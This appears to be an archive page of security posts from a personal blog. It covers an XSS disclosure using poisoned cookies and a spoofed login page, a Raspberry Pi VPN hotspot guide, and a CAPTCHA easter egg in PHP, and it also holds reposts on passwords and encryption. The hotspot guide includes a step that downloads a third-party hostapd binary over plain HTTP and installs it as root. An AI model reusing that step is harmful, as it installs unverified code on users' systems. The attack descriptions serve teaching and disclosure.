Defeating Quantum Algorithms with Hash Functions

This is a repost promoting content originally published elsewhere. See more things Dan's reposted.

In this post I’ll explain why quantum computers are useless to find hash function collisions, and how we can leverage this powerlessness to build post-quantum signature schemes. I’ll then describe a quantum computing model that you can try at home, and  one where hash function collisions are easy to find…

TLS 1.3 FTW

This is a repost promoting content originally published elsewhere. See more things Dan's reposted.

In common slang, FTW is an acronym “for the win” and while that’s appropriate here, I think a better expansion is “for the world.”

We’re pleased to announce that we have sponsored the development of TLS 1.3 in OpenSSL. As it is one of the most widely-used TLS libraries, it is a good investment for the overall health and security of the Internet, so that everyone is able to deploy TLS 1.3 as soon as possible…

Against DNSSEC

This is a repost promoting content originally published elsewhere. See more things Dan's reposted.

All secure crypto on the Internet assumes that the DNS lookup from names to IP addresses are insecure. Securing those DNS lookups therefore enables no meaningful security. DNSSEC does make some attacks against insecure sites harder. But it doesn’t make those attacks infeasible, so sites still need to adopt secure transports like TLS. With TLS properly configured, DNSSEC adds nothing…

Troy Hunt: HTTPS adoption has reached the tipping point

This is a repost promoting content originally published elsewhere. See more things Dan's reposted.

That’s it – I’m calling it – HTTPS adoption has now reached the moment of critical mass where it’s gathering enough momentum that it will very shortly become “the norm” rather than the exception it so frequently was in the past. In just the last few months, there’s been some really significant things happen that have caused me to make this call, here’s why I think we’re now at that tipping point…

NISTs new password rules what you need to know

This is a repost promoting content originally published elsewhere. See more things Dan's reposted.

It’s no secret. We’re really bad at passwords. Nevertheless, they aren’t going away any time soon.

With so many websites and online applications requiring us to create accounts and think up passwords in a hurry, it’s no wonder so many of us struggle to follow the advice of so-called password security experts.

Stereotypical hacker in a hoodie, from the article.

At the same time, the computing power available for password cracking just gets bigger and bigger.

OK, so I started with the bad news, but this cloud does have a silver lining…

Breaking https’ AES-GCM (or a part of it)

This is a repost promoting content originally published elsewhere. See more things Dan's reposted.

The coolest talk of this year’s Blackhat must have been the one of Sean Devlin and Hanno Böck. The talk summarized this early year’s paper, in a very cool way: Sean walked on stage and announced that he didn’t have his slides. He then said that it didn’t matter because he had a good idea on how to retrieve them…

A hacker 'steals his own slides back'

Anatomy of Cookie XSS

A cross-site scripting vulnerability (shortened to XSS, because CSS already means other things) occurs when a website can be tricked into showing a visitor unsafe content that came from another site visitor. Typically when we talk about an XSS attack, we’re talking about tricking a website into sending Javascript code to the user: that Javascript code can then be used to steal cookies and credentials, vandalise content, and more.

Good web developers know to sanitise input – making anything given to their pages by a user safe before ever displaying it on a page – but even the best can forget quite how many things really are “user input”.

"Who Am I?" page provided by University of Oxford IT Services.
This page outputs a variety of your inputs right back at you.

Recently, I reported a vulnerability in a the University of Oxford’s IT Services‘ web pages that’s a great example of this.  The page (which isn’t accessible from the public Internet, and now fixed) is designed to help network users diagnose problems. When you connect to it, it tells you a lot of information about your connection: what browser you’re using, your reverse DNS lookup and IP address, etc.. The developer clearly understood that XSS was a risk, because if you pass a query string to the page, it’s escaped before it’s returned back to you. But unfortunately, the developer didn’t consider the fact that virtually anything given to you by the browser can’t be trusted.

My Perl program, injecting XSS code into the user's cookie and then redirecting them.
To demonstrate this vulnerability, I had the option of writing Perl or Javascript. For some reason, I chose Perl.

In this case, I noticed that the page would output any cookies that you had from the .ox.ac.uk domain, without escaping them. .ox.ac.uk cookies can be manipulated by anybody who has access to write pages on the domain, which – thanks to the users.ox.ac.uk webspace – means any staff or students at the University (or, in an escalation attack, anybody’s who’s already compromised the account of any staff member or student). The attacker can then set up a web page that sets up such a “poisoned” cookie and then redirects the user to the affected page and from there, do whatever they want. In my case, I experimented with showing a fake single sign-on login page, almost indistinguishable from the real thing (it even has a legitimate-looking .ox.ac.uk domain name served over a HTTPS connection, padlock and all). At this stage, a real attacker could use a spear phishing scam to trick users into clicking a link to their page and start stealing credentials.

A fake SSO login page, delivered from a legitimate-looking https URL.
The padlock, the HTTPS url, and the convincing form make this page look legitimate. But it’s actually spoofed.

I’m sure that I didn’t need to explain why XSS vulnerabilities are dangerous. But I wanted to remind you all that truly anything that comes from the user’s web browser, even if you think that you probably put it there yourself, can’t be trusted. When you’re defending against XSS attacks, your aim isn’t just to sanitise obvious user input like GET and POST parameters but also anything that comes from a browser header including cookies and referer headers, especially if your domain name carries websites managed by many different people. In an ideal world, Content Security Policy would mitigate all these kinds of attacks: but in our real world – sanitise those inputs!

× × ×

Payment Redirection Fraud

This is a repost promoting content originally published elsewhere. See more things Dan's reposted.

Here is an example scenario… You receive an email requesting a payment. It could be for rent, it could be fees for a course or any other legitimate reason. Typically, the payment is a significant sum. The email contains the banking details you need to make the payment. Then shortly after the 1st email arrives…

Raspberry Pi VPN Hotspot (or How To Infuriate Theresa May For Under £40)

As you’re no-doubt aware, Home Secretary Theresa May is probably going to get her way with her “snooper’s charter” by capitalising on events in Paris (even though that makes no sense), and before long, people working for law enforcement will be able to read your Internet usage history without so much as a warrant (or, to put it as the UN’s privacy chief put it, it’s “worse than scary”).

John Oliver on Last Week Tonight discusses the bill.
Or as John Oliver put it, “This bill could write into law a huge invasion of privacy.” Click to see a clip.

In a revelation that we should be thankful of as much as we’re terrified by, our government does not understand how the Internet works. And that’s why it’s really easy for somebody with only a modicum of geekery to almost-completely hide their online activities from observation by their government and simultaneously from hackers. Here’s a device that I built the other weekend, and below I’ll tell you how to do it yourself (and how it keeps you safe online from a variety of threats, as well as potentially giving you certain other advantages online):

"Iceland", one of my Raspberry Pi VPN hotspots
It’s small, it’s cute, and it goes a long way to protecting my privacy online.

I call it “Iceland”, for reasons that will become clear later. But a more-descriptive name would be a “Raspberry Pi VPN Hotspot”. Here’s what you’ll need if you want to build one:

  • A Raspberry Pi Model B (or later) – you can get these from less than £30 online and it’ll come with an SD card that’ll let it boot Raspbian, which is the Linux distribution I’ve used in my example: there’s no reason you couldn’t use another one if you’re familiar with it
  • A USB WiFi dongle that supports “access point” mode – I’m using an Edimax one that cost me under a fiver – but it took a little hacking to make it work – I’ve heard that Panda and RALink dongles are easier
  • A subscription to a VPN with OpenVPN support and at least one endpoint outside of the UK – I’m using VyprVPN because I have a special offer, but there are lots of cheaper options: here’s a great article about choosing one
  • A basic familiarity with a *nix command line, an elementary understanding of IP networking, and a spare 20 minutes.

From here on, this post gets pretty geeky. Unless you plan on building your own little box to encrypt all of your home’s WiFi traffic until it’s well out of the UK and close-to-impossible to link to you personally (which you should!), then you probably ought to come back to it another time.

Here’s how it’s done:

1. Plug in, boot, and install some prerequisites

Plug the WiFi dongle into a USB port and connect the Ethernet port to your Internet router.  Boot your Raspberry Pi into Raspbian (as described in the helpsheet that comes with it), and run:

sudo apt-get install bridge-utils hostapd udhcpd bind9 openvpn

2. Make HostAPD support your Edimax dongle

If, like me, you’re using an Edimax dongle, you need to do an extra couple of steps to make it work as an access point. Skip this bit if you’re using one of the other dongles I listed or if you know better.

wget http://dl.dropbox.com/u/1663660/hostapd/hostapd.zip
unzip hostapd.zip
sudo mv /usr/sbin/hostapd /usr/sbin/hostapd.original
sudo mv hostapd /usr/sbin/hostapd.edimax
sudo ln -sf /usr/sbin/hostapd.edimax /usr/sbin/hostapd
sudo chown root.root /usr/sbin/hostapd
sudo chmod 755 /usr/sbin/hostapd

3. Set up OpenVPN

Get OpenVPN configuration files from your VPN provider: often these will be available under the iOS downloads. There’ll probably be one for each available endpoint. I chose the one for Reyjkavik, because Iceland’s got moderately sensible privacy laws and I’m pretty confident that it would take judicial oversight for British law enforcement to collaborate with Icelandic authorities on getting a wiretap in place, which is the kind of level of privacy I’m happy with. Copy your file to /etc/openvpn/openvpn.conf and edit it: you may find that you need to put your VPN username and password into it to make it work.

sudo service openvpn start

You can now test your VPN’s working, if you like. I suggest connecting to the awesome icanhazip.com and asking it where you are (you can use your favourite GeoIP website to tell you what country it thinks you’re in, based on that):

curl -4 icanhazip.com

Another option would be to check with a GeoIP service directly:

curl freegeoip.net/json/

4. Set up your firewall and restart the VPN connection

Unless your VPN provider gives you DNAT (and even if they do, if you’re paranoid), you should set up a firewall to allow only outgoing connections to be established, and then restart your VPN connection:

sudo iptables -A INPUT -i tun0 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A INPUT -i tun0 -j DROP
sudo sh -c "iptables-save > /etc/iptables.nat.vpn.secure"
sudo sh -c "echo 'up iptables-restore < /etc/iptables.nat.vpn.secure' >> /etc/network/interfaces"
sudo service openvpn restart

5. Configure your WiFi hotspot

Configure bind as your DNS server, caching responses on behalf of Google’s DNS servers, or another DNS server that you trust. Alternatively, you can just configure your DHCP clients to use Google’s DNS servers directly, but caching will probably improve your performance overall. To do this, add a forwarder to /etc/bind/named.conf.options:

forwarders {
  8.8.8.8;
  8.8.4.4;
};

Restart bind, and make sure it loads on boot:

sudo service bind9 restart
sudo update-rc.d bind9 enable

Edit /etc/udhcpd.conf. As a minimum, you should have a configuration along these lines (you might need to tweak your IP address assignments to fit with your local network – the “router” and “dns” settings should be set to the IP address you’ll give to your Raspberry Pi):

start 192.168.0.2
end 192.168.0.254
interface wlan0
remaining yes
opt dns 192.168.0.1
option subnet 255.255.255.0
opt router 192.168.0.1
option lease 864000 # 10 days

Enable DHCP by uncommenting (remove the hash!) the following line in /etc/default/udhcpd:

#DHCPD_ENABLED="yes"

Set a static IP address on your Raspberry Pi in the same subnet as you configured above (but not between the start and end of the DHCP list):

sudo ifconfig wlan0 192.168.0.1

And edit your /etc/network/interfaces file to configure it to retain this on reboot (you’ll need to use tabs, not spaces, for indentation):

iface wlan0 inet static
  address 192.168.0.1
  netmask 255.255.255.0

And comment out the lines relating to hot-plugging of WiFi adapters/network hopping:

#allow-hotplug wlan0
#wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
#iface default inet manual

Right – onto hostapd, the fiddliest of the tools you’ll have to configure. Create or edit /etc/hostapd/hostapd.conf as follows, but substitute in your own SSID, hotspot password, and channel (to minimise interference, which can slow your network down, I recommend using WiFi scanner tool on your mobile to find which channels your neighbours aren’t using, and use one of those – you should probably avoid the channel your normal WiFi uses, too, so you don’t slow your own connection down with crosstalk):

interface=wlan0
driver=nl80211
ssid=your network name
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=your network password
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP

Hook up this configuration by editing /etc/default/hostapd:

DAEMON_CONF="/etc/hostapd/hostapd.conf"

Fire up the hotspot, and make sure it runs on reboot:

sudo service hostapd start
sudo service udhcpd start
sudo update-rc.d hostapd enable
sudo update-rc.d udhcpd enable

Finally, set up NAT so that people connecting to your new hotspot are fowarded through the IP tunnel of your VPN connection:

sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
sudo sh -c "echo net.ipv4.ip_forward=1 >> /etc/sysctl.conf"
sudo iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE
sudo sh -c "iptables-save > /etc/iptables.nat.vpn.secure"

6. Give it a go!

Connect to your new WiFi hotspot, and go to your favourite GeoIP service. Or, if your VPN endpoint gives you access to geographically-limited services, give those a go (you’d be amazed how different the Netflix catalogues are in different parts of the world). And give me a shout if you need any help or if you have any clever ideas about how this magic little box can be improved.

Further reading:

×

Squiz CMS Easter Eggs (or: why do I keep seeing Greg’s name in my CAPTCHA?)

Anybody who has, like me, come into contact with the Squiz Matrix CMS for any length of time will have come across the reasonably easy-to-read but remarkably long CAPTCHA that it shows. These are especially-noticeable in its administrative interface, where it uses them as an exaggerated and somewhat painful “are you sure?” – restarting the CMS’s internal crontab manager, for example, requires that the administrator types a massive 25-letter CAPTCHA.

Four long CAPTCHA from the Squiz Matrix CMS.
Four long CAPTCHA from the Squiz Matrix CMS.

But there’s another interesting phenomenon that one begins to notice after seeing enough of the back-end CAPTCHA that appear. Strange patterns of letters that appear in sequence more-often than would be expected by chance. If you’re a fan of wordsearches, take a look at the composite screenshot above: can you find a person’s name in each of the four lines?

Four long CAPTCHA from the Squiz Matrix CMS, with the names Greg, Dom, Blair and Marc highlighted.
Four long CAPTCHA from the Squiz Matrix CMS, with the names Greg, Dom, Blair and Marc highlighted.

There are four names – GregDomBlair and Marc – which routinely appear in these CAPTCHA. Blair, being the longest name, was the first that I noticed, and at first I thought that it might represent a fault in the pseudorandom number generation being used that was resulting in a higher-than-normal frequency of this combination of letters. Another idea I toyed with was that the CAPTCHA text might be being entirely generated from a set of pronounceable syllables (which is a reasonable way to generate one-time passwords that resist entry errors resulting from reading difficulties: in fact, we do this at Three Rings), in which these four names also appear, but by now I’d have thought that I’d have noticed this in other patterns, and I hadn’t.

Instead, then, I had to conclude that these names were some variety of Easter Egg.

In software (and other media), "Easter Eggs" are undocumented hidden features, often in the form of inside jokes.
Smiley decorated eggs. Picture courtesy Kate Ter Haar.

I was curious about where they were coming from, so I searched the source code, but while I found plenty of references to Greg Sherwood, Marc McIntyre, and Blair Robertson. I couldn’t find Dom, but I’ve since come to discover that he must be Dominic Wong – these four were, according to Greg’s blog – developers with Squiz in the early 2000s, and seemingly saw themselves as a dynamic foursome responsible for the majority of the CMS’s code (which, if the comment headers are to be believed, remains true).

Greg, Marc, Blair and Dom, as depicted in Greg's 2007 blog post.
Greg, Marc, Blair and Dom, as depicted in Greg’s 2007 blog post.

That still didn’t answer for me why searching for their names in the source didn’t find the responsible code. I started digging through the CMS’s source code, where I eventually found fudge/general/general.inc (a lot of Squiz CMS code is buried in a folder called “fudge”, and web addresses used internally sometimes contain this word, too: I’d like to believe that it’s being used as a noun and that the developers were just fans of the buttery sweet, but I have a horrible feeling that it was used in its popular verb form). In that file, I found this function definition:

/**
 * Generates a string to be used for a security key
 *
 * @param int            $key_len                the length of the random string to display in the image
 * @param boolean        $include_uppercase      include uppercase characters in the generated password
 * @param boolean        $include_numbers        include numbers in the generated password
 *
 * @return string
 * @access public
 */
function generate_security_key($key_len, $include_uppercase = FALSE, $include_numbers = FALSE) {
  $k = random_password($key_len, $include_uppercase, $include_numbers);
  if ($key_len > 10) {
    $gl = Array('YmxhaXI=', 'Z3JlZw==', 'bWFyYw==', 'ZG9t');
    $g = base64_decode($gl[rand(0, (count($gl) - 1)) ]);
    $pos = rand(1, ($key_len - strlen($g)));
    $k = substr($k, 0, $pos) . $g . substr($k, ($pos + strlen($g)));
  }
  return $k;
} //end generate_security_key()

For the benefit of those of you who don’t speak PHP, especially PHP that’s been made deliberately hard to decipher, here’s what’s happening when “generate_security_key” is being called:

  • A random password is being generated.
  • If that password is longer than 10 characters, a random part of it is being replaced with either “blair”, “greg”, “marc”, or “dom”. The reason that you can’t see these words in the code is that they’re trivially-encoded using a scheme called Base64 – YmxhaXI=Z3JlZw==, bWFyYw==, and ZG9t are Base64 representations of the four names.

This seems like a strange choice of Easter Egg: immortalising the names of your developers in CAPTCHA. It seems like a strange choice especially because this somewhat weakens the (already-weak) CAPTCHA, because an attacking robot can quickly be configured to know that a 11+-letter codeword will always consist of letters and exactly one instance of one of these four names: in fact, knowing that a CAPTCHA will always contain one of these four and that I can refresh until I get one that I like, I can quickly turn an 11-letter CAPTCHA into a 6-letter one by simply refreshing until I get one with the longest name – Blair – in it!

A lot has been written about how Easter Eggs undermine software security (in exchange for a small boost to developer morale) – that’s a major part of why Microsoft has banned them from its operating systems (and, for the most part, Apple has too). Given that these particular CAPTCHA in Squiz CMS are often nothing more than awkward-looking “are you sure?” dialogs, I’m not concerned about the direct security implications, but it does make me worry a little about the developer culture that produced them.

I know that this Easter Egg might be harmless, but there’s no way for me to know (short of auditing the entire system) what other Easter Eggs might be hiding under the surface and what they do, especially if the developers have, as in this case, worked to cover their tracks! It’s certainly the kind of thing I’d worry about if I were, I don’t know, a major government who use Squiz software, especially their cloud-hosted variants which are harder to effectively audit. Just a thought.

× × ×

Social Engineering of the Day

This afternoon I was sent out to a distant corner of Oxford University, to which I’d never been before, in order to deliver a lecture on information and computer security. I just wanted to share the exchange that happened when I arrived, because it’s so delightfully ironic:

Dan walks into the building and, seeing the security gates, walks up to the reception desk. Papers left loose on the reception desk indicate that a lecture on security is happening today.

Dan: [pointing at his name on the papers] That’s me. I’m here to deliver the presentation on security. Where should I go?

Receptionist: I’ll buzz you through the gate – go down the stairs, and to the end of the corridor. There’ll be swipe-locked doors you can’t get through, but just hang around for a minute or so and you’ll be able to follow somebody else through.

That’s right – I turned up at a building in order to teach the people there about security, and – without identifying myself any more than pointing at a piece of paper and saying “that’s me” – was given a temporary ID card and encouraged to piggyback my way through their checkpoints. I guess they needed me more than they thought!

Something like HTTPS Everywhere for new Opera?

This self-post was originally posted to /r/operabrowser. See more things from Dan's Reddit account.

I’m looking for an extension that will automatically redirect-to-HTTPS for particular domains, e.g. to ensure that I’m using the secure version of Wikipedia, etc., whenever I go there. The HTTPS Everywhere plugin from the EFF does this for Firefox and Chrome; what can I do to make this work in Opera?

Phone Security == Computer Security

The explosion of smartphone ownership over the last decade has put powerful multi-function computers into the pockets of almost half of us. But despite the fact that the average smartphone contains at least as much personally-identifiable information as its owner keeps on their home computer (or in dead-tree form) at their house – and is significantly more-prone to opportunistic theft – many users put significantly less effort into protecting their mobile’s data than they do the data they keep at home.

Nokia E7, showing lock screen.
Too late, little Nokia E7: I’ve got physical access to you now.

I have friends who religiously protect their laptops and pendrives with TrueCrypt, axCrypt, or similar, but still carry around an unencrypted mobile phone. What we’re talking about here is a device that contains all of the contact details for you and everybody you know, as well as potentially copies of all of your emails and text messages, call histories, magic cookies for social networks and other services, saved passwords, your browsing history (some people would say that’s the most-incriminating thing on their phone!), authentication apps, photos, videos… more than enough information for an attacker to pursue a highly-targeted identity theft or phishing attack.

Pattern lock configuration on an Android mobile phone.
Android pattern lock: no encryption, significantly less-random than an equivalent-length PIN, and easily broken by a determined attacker.

“Pattern lock” is popular because it’s fast and convenient. It might be good enough to stop your kids from using your phone without your permission (unless they’re smart enough to do some reverse smudge engineering: looking for the smear-marks made by your fingers as you unlock the device; and let’s face it, they probably are), but it doesn’t stand up to much more than that. Furthermore, gesture unlock solutions dramatically reduce the number of permutations, because you can’t repeat a digit: so much so, that you can easily perform a rainbow table attack on the SHA1 hash to reverse-engineer somebody’s gesture. Even if Android applied a per-device psuedorandom salt to the gesture pattern (they don’t, so you can download a prefab table), it doesn’t take long to generate an SHA1 lookup of just 895,824 codes (maybe Android should have listened to Coda Hale’s advice and used BCrypt, or else something better still).

iPhone showing the PIN lock screen.
An encrypted iPhone can be configured to resist brute-force attacks by wiping the phone after repeated failures, which replaces one security fault (brute-force weakness) with another (a denial of service attack that’s so easy that your friends can do it by accident).

These attacks, though (and the iPhone isn’t bulletproof, either), are all rather academic, because they are trumped by the universal rule that once an attacker has physical access to your device, it is compromised. This is fundamentally the way in which mobile security should be considered to be equivalent to computer security. All of the characteristics distinct to mobile devices (portability, ubiquity, processing power, etc.) are weaknesses, and that’s why smartphones deserve at least as much protection as desktop computers protecting the same data. Mobile-specific features like “remote wipe” are worth having, but can’t be relied upon alone – a wily attacker could easily keep your phone in a lead box or otherwise disable its connectivity features until it’s cracked.

A finger swipes-to-unlock a Samsung mobile phone.
The bottom line: if the attacker gets hold of your phone, you’re only as safe as your encryption.

The only answer is to encrypt your device (with a good password). Having to tap in a PIN or password may be less-convenient than just “swipe to unlock”, but it gives you a system that will resist even the most-thorough efforts to break it, given physical access (last year’s iPhone 4 vulnerability notwithstanding).

It’s still not perfect – especially here in the UK, where the RIPA can be used (and has been used) to force key surrender. What we really need is meaningful, usable “whole system” mobile encryption with plausible deniability. But so long as you’re only afraid of identity thieves and phishing scammers, and not being forced to give up your password by law or under duress, then it’s “good enough”.

Of course, it’s only any use if it’s enabled before your phone gets stolen! Like backups, security is one of those things that everybody should make a habit of thinking about. Go encrypt your smartphone; it’s remarkably easy –

Rave Reviews for Your Password Sucks

Last month, I volunteered myself to run a breakout session at the 2012 UAS Conference, an annual gathering of up to a thousand Oxford University staff. I’d run a 2-minute micropresentation at the July 2011 OxLibTeachMeet called “Your Password Sucks!”, and I thought I’d probably be able to expand that into a larger 25-minute breakout session.

Your password: How bad guys will steal your identity
My expanded presentation was called “Your password: How bad guys will steal your identity”, because I wasn’t sure that I’d get away with the title “Your Password Sucks” at a larger, more-formal event.

The essence of my presentation boiled down to demonstrating four points. The first was you are a target – dispelling the myth that the everyday person can consider themselves safe from the actions of malicious hackers. I described the growth of targeted phishing attacks, and relayed the sad story of Mat Honan’s victimisation by hackers.

The second point was that your password is weak: I described the characteristics of good passwords (e.g. sufficiently long, complex, random, and unique) and pointed out that even among folks who’d gotten a handle on most of these factors, uniqueness was still the one that tripped people over. A quarter of people use only a single password for most or all of their accounts, and over 50% use 5 or fewer passwords across dozens of accounts.

You are a target. Your password is weak. Attacks are on the rise. You can protect yourself.
The four points I wanted to make through my presentation. Starting by scaring everybody ensured that I had their attention right through ’til I told them what they could do about it, at the end.

Next up: attacks are on the rise. By a combination of statistics, anecdotes, audience participation and a theoretical demonstration of how a hacker might exploit shared-password vulnerabilities to gradually take over somebody’s identity (and then use it as a platform to attack others), I aimed to show that this is not just a hypothetical scenario. These attacks really happen, and people lose their money, reputation, or job over them.

Finally, the happy ending to the story: you can protect yourself. Having focussed on just one aspect of password security (uniqueness), and filling a 25-minute slot with it, I wanted to give people some real practical suggestions for the issue of password uniqueness. These came in the form of free suggestions that they could implement today. I suggested “cloud” options (like LastPass or 1Password), hashing options (like SuperGenPass), and “offline” technical options (like KeePass or a spreadsheet bundles into a TrueCrypt volume).

I even suggested a non-technical option involving a “master” password that is accompanied by one of several unique prefixes. The prefixes live on a Post-It Note in your wallet. Want a backup? Take a picture of them with your mobile: they’re worthless without the master password, which lives in your head. It’s not as good as a hash-based solution, because a crafty hacker who breaks into several systems might be able to determine your master password, but it’s “good enough” for most people and a huge improvement on using just 5 passwords everywhere! (another great “offline” mechanism is Steve Gibson’s Off The Grid system)

"Delivery" ratings for the UAS Conference "breakout" sessions
My presentation – marked on the above chart – left people “Very Satisfied” significantly more than any other of the 50 breakout sessions.

And it got fantastic reviews! That pleased me a lot. The room was packed, and eventually more chairs had to be brought in for the 70+ folks who decided that my session was “the place to be”. The resulting feedback forms made me happy, too: on both Delivery and Content, I got more “Very Satisfied” responses than any other of the 50 breakout sessions, as well as specific comments. My favourite was:

Best session I have attended in all UAS conferences. Dan Q gave a 5 star performance.

So yeah; hopefully they’ll have me back next year.

×